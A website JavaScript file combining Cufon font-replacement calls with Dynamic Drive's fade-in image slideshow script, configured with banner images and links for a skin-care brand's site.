Cufon.replace('h2.brand-box', { fontFamily: 'delicious' });
Cufon.replace('h1.title,h3.nletter1,h3.nletter2,h3.sidemenu,h4.footer', { fontFamily: 'myriadpro' }); 



;
/***********************************************
* Ultimate Fade-In Slideshow (v1.51): © Dynamic Drive (http://www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit http://www.dynamicdrive.com/ for this script and 100s more.
***********************************************/
 
var fadeimages=new Array()
//SET IMAGE PATHS. Extend or contract array as needed
fadeimages[0]=["http://www.bellaboobabe.com/kiss/front/fader/main_fader_3step.jpg", "http://www.bellaboobabe.com/bellaboo-skin-care", ""] //image with link and target syntax
fadeimages[1]=["http://www.bellaboobabe.com/kiss/front/fader/main_fader_mo.jpg", "http://www.bellaboobabe.com/bellaboo-skin-care", ""] //image with link syntax
fadeimages[2]=["http://www.bellaboobabe.com/kiss/front/fader/mag_fader_NOV2011.png", "http://www.bellaboobabe.com/mag", ""] //image with link syntax

var fadeimages2=new Array() //2nd array set example. Remove or add more sets as needed.
//SET IMAGE PATHS. Extend or contract array as needed
fadeimages2[0]=["photo1.jpg", "", ""] //plain image syntax
fadeimages2[1]=["photo2.jpg", "http://www.cssdrive.com", ""] //image with link syntax
fadeimages2[2]=["photo3.jpg", "http://www.javascriptkit.com", "_new"] //image with link and target syntax
 
var fadebgcolor="white"

////NO need to edit beyond here/////////////
 
var fadearray=new Array() //array to cache fadeshow instances
var fadeclear=new Array() //array to cache corresponding clearinterval pointers
 
var dom=(document.getElementById) //modern dom browsers
var iebrowser=document.all
 
function fadeshow(theimages, fadewidth, fadeheight, borderwidth, delay, pause, displayorder){
this.pausecheck=pause
this.mouseovercheck=0
this.delay=delay
this.degree=10 //initial opacity degree (10%)
this.curimageindex=0
this.nextimageindex=1
fadearray[fadearray.length]=this
this.slideshowid=fadearray.length-1
this.canvasbase="canvas"+this.slideshowid
this.curcanvas=this.canvasbase+"_0"
if (typeof displayorder!="undefined")
theimages.sort(function() {return 0.5 - Math.random();}) //thanks to Mike (aka Mwinter) :)
this.theimages=theimages
this.imageborder=parseInt(borderwidth)
this.postimages=new Array() //preload images
for (p=0;p<theimages.length;p++){
this.postimages[p]=new Image()
this.postimages[p].src=theimages[p][0]
}
 
var fadewidth=fadewidth+this.imageborder*2
var fadeheight=fadeheight+this.imageborder*2
 
if (iebrowser&&dom||dom) //if IE5+ or modern browsers (ie: Firefox)
document.write('<div id="master'+this.slideshowid+'" style="position:relative;width:'+fadewidth+'px;height:'+fadeheight+'px;overflow:hidden;"><div id="'+this.canvasbase+'_0" style="position:absolute;width:'+fadewidth+'px;height:'+fadeheight+'px;top:0;left:0;filter:progid:DXImageTransform.Microsoft.alpha(opacity=10);opacity:0.1;-moz-opacity:0.1;-khtml-opacity:0.1;background-color:'+fadebgcolor+'"></div><div id="'+this.canvasbase+'_1" style="position:absolute;width:'+fadewidth+'px;height:'+fadeheight+'px;top:0;left:0;filter:progid:DXImageTransform.Microsoft.alpha(opacity=10);opacity:0.1;-moz-opacity:0.1;-khtml-opacity:0.1;background-color:'+fadebgcolor+'"></div></div>')
else
document.write('<div><img name="defaultslide'+this.slideshowid+'" src="'+this.postimages[0].src+'"></div>')
 
if (iebrowser&&dom||dom) //if IE5+ or modern browsers such as Firefox
this.startit()
else{
this.curimageindex++
setInterval("fadearray["+this.slideshowid+"].rotateimage()", this.delay)
}
}

function fadepic(obj){
if (obj.degree<100){
obj.degree+=10
if (obj.tempobj.filters&&obj.tempobj.filters[0]){
if (typeof obj.tempobj.filters[0].opacity=="number") //if IE6+
obj.tempobj.filters[0].opacity=obj.degree
else //else if IE5.5-
obj.tempobj.style.filter="alpha(opacity="+obj.degree+")"
}
else if (obj.tempobj.style.MozOpacity)
obj.tempobj.style.MozOpacity=obj.degree/101
else if (obj.tempobj.style.KhtmlOpacity)
obj.tempobj.style.KhtmlOpacity=obj.degree/100
else if (obj.tempobj.style.opacity&&!obj.tempobj.filters)
obj.tempobj.style.opacity=obj.degree/101
}
else{
clearInterval(fadeclear[obj.slideshowid])
obj.nextcanvas=(obj.curcanvas==obj.canvasbase+"_0")? obj.canvasbase+"_0" : obj.canvasbase+"_1"
obj.tempobj=iebrowser? iebrowser[obj.nextcanvas] : document.getElementById(obj.nextcanvas)
obj.populateslide(obj.tempobj, obj.nextimageindex)
obj.nextimageindex=(obj.nextimageindex<obj.postimages.length-1)? obj.nextimageindex+1 : 0
setTimeout("fadearray["+obj.slideshowid+"].rotateimage()", obj.delay)
}
}
 
fadeshow.prototype.populateslide=function(picobj, picindex){
var slideHTML=""
if (this.theimages[picindex][1]!="") //if associated link exists for image
slideHTML='<a href="'+this.theimages[picindex][1]+'" target="'+this.theimages[picindex][2]+'">'
slideHTML+='<img src="'+this.postimages[picindex].src+'" border="'+this.imageborder+'px">'
if (this.theimages[picindex][1]!="") //if associated link exists for image
slideHTML+='</a>'
picobj.innerHTML=slideHTML
}
 
 
fadeshow.prototype.rotateimage=function(){
if (this.pausecheck==1) //if pause onMouseover enabled, cache object
var cacheobj=this
if (this.mouseovercheck==1)
setTimeout(function(){cacheobj.rotateimage()}, 100)
else if (iebrowser&&dom||dom){
this.resetit()
var crossobj=this.tempobj=iebrowser? iebrowser[this.curcanvas] : document.getElementById(this.curcanvas)
crossobj.style.zIndex++
fadeclear[this.slideshowid]=setInterval("fadepic(fadearray["+this.slideshowid+"])",50)
this.curcanvas=(this.curcanvas==this.canvasbase+"_0")? this.canvasbase+"_1" : this.canvasbase+"_0"
}
else{
var ns4imgobj=document.images['defaultslide'+this.slideshowid]
ns4imgobj.src=this.postimages[this.curimageindex].src
}
this.curimageindex=(this.curimageindex<this.postimages.length-1)? this.curimageindex+1 : 0
}
 
fadeshow.prototype.resetit=function(){
this.degree=10
var crossobj=iebrowser? iebrowser[this.curcanvas] : document.getElementById(this.curcanvas)
if (crossobj.filters&&crossobj.filters[0]){
if (typeof crossobj.filters[0].opacity=="number") //if IE6+
crossobj.filters(0).opacity=this.degree
else //else if IE5.5-
crossobj.style.filter="alpha(opacity="+this.degree+")"
}
else if (crossobj.style.MozOpacity)
crossobj.style.MozOpacity=this.degree/101
else if (crossobj.style.KhtmlOpacity)
crossobj.style.KhtmlOpacity=this.degree/100
else if (crossobj.style.opacity&&!crossobj.filters)
crossobj.style.opacity=this.degree/101
}
 
 
fadeshow.prototype.startit=function(){
var crossobj=iebrowser? iebrowser[this.curcanvas] : document.getElementById(this.curcanvas)
this.populateslide(crossobj, this.curimageindex)
if (this.pausecheck==1){ //IF SLIDESHOW SHOULD PAUSE ONMOUSEOVER
var cacheobj=this
var crossobjcontainer=iebrowser? iebrowser["master"+this.slideshowid] : document.getElementById("master"+this.slideshowid)
crossobjcontainer.onmouseover=function(){cacheobj.mouseovercheck=1}
crossobjcontainer.onmouseout=function(){cacheobj.mouseovercheck=0}
}
this.rotateimage()
};

